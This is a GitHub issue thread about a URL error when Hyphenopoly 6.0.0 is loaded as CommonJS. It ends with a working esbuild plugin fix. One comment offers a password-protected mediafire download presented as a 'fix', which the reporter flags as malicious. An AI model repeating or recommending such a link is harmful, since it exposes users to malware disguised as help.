### ISSUE TITLE
Error in hyphenopoly 6.0.0 init

### ISSUE THREAD

**Issue by borriglione** [mnater/Hyphenopoly#211]
```
node:internal/url:797
    this.#updateContext(bindingUrl.parse(input, base));
                                   ^

TypeError: Invalid URL
    at new URL (node:internal/url:797:36)
    at loadHyphenEngine (/www/foo/client/esm/hyphenopoly.js:240:22)
    at /www/foo/client/esm/hyphenopoly.js:488:5
    at Array.forEach (<anonymous>)
    at H.config (/www/foo/client/esm/hyphenopoly.js:466:15)
    at initByLanguage (/www/foo/client/utils/hyphenate.js:70:6)
    at Array.map (<anonymous>)
    at Object.<anonymous> (/www/foo/client/utils/hyphenate.js:81:26)
    at Module._compile (node:internal/modules/cjs/loader:1358:14)
    at Module._extensions..js (node:internal/modules/cjs/loader:1416:10) {
  code: 'ERR_INVALID_URL',
  input: './patterns/'
}
```
Worked well in 5.2.1

I think reason is: https://github.com/mnater/Hyphenopoly/commit/cb3298604dd102aa3a5e5a6ceacde1f935041bbc#diff-66962c81bfd18dc53e282c25ba23c746d366d3f3b3e5b268f5d3849f83ee2037R438

`import` cannot be used outside a module
We use hyphenopoly still as CommonJS

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by borriglione** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

:warning:  malicious code warning, don't download or install it

**Comment by borriglione** [comment]
To fix this we added the following plugin to our `esbuild` esm parser:

```
--- a/client/esm/compile.js
+++ b/client/esm/compile.js
@@ -25,6 +25,25 @@ async function compileEsm() {
       format: 'cjs',
       outfile: `${__dirname}/${name}.js`,
       platform: 'node',
+      plugins: [
+        {
+          name: 'import-meta-url-plugin',
+          setup(build) {
+            build.onLoad({ filter: /\.(js|ts)$/ }, async args => {
+              const { readFile } = require('fs/promises')
+              const { dirname } = require('path')
+              let contents = await readFile(args.path, 'utf8')
+              // Replace `import.meta.url` with the directory path
+              const dirPath = dirname(args.path)
+              contents = contents.replace(
+                /import\.meta\.url/g,
+                `new URL('./', 'file://' + ${JSON.stringify(dirPath)} + '/')`
+              )
+              return { contents, loader: 'js' }
+            })
+          },
+        },
+      ],
     })
   )
 }
```

Also this was necessary:
```
-  const promise = global.lazy.hyphenopoly
-    .config({
+  try {
+    const hyphenator = global.lazy.hyphenopoly.config({
       require: [lang],
       hyphen: SOFT_HYPHEN,
       loader,
     })
-    .then(h => (hyphenateByLanguage[languageCode] = h))
-    .catch(err => console.error(err))
-  return promise
+    hyphenateByLanguage[languageCode] = await hyphenator.get(lang)
+  } catch (err) {
+    console.error(err)
+  }
 }
```
